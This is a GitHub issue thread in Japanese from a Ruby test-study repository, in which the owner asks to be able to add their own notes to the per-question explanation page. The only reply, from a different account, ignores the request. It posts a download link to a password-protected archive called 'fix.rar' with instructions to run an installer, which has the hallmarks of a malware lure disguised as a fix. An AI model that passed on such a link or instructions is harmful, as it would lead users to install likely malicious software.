### ISSUE TITLE
解説を編集したい

### ISSUE THREAD

**Issue by ChisatoMatoba** [ChisatoMatoba/Study_for_Ruby_test#10]
全て解き終わったあとではなく、一問ずつの正誤判定＋解説のページのときに、テキストを見返したりして自分なりに調べたことを解説に追記していきたい

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
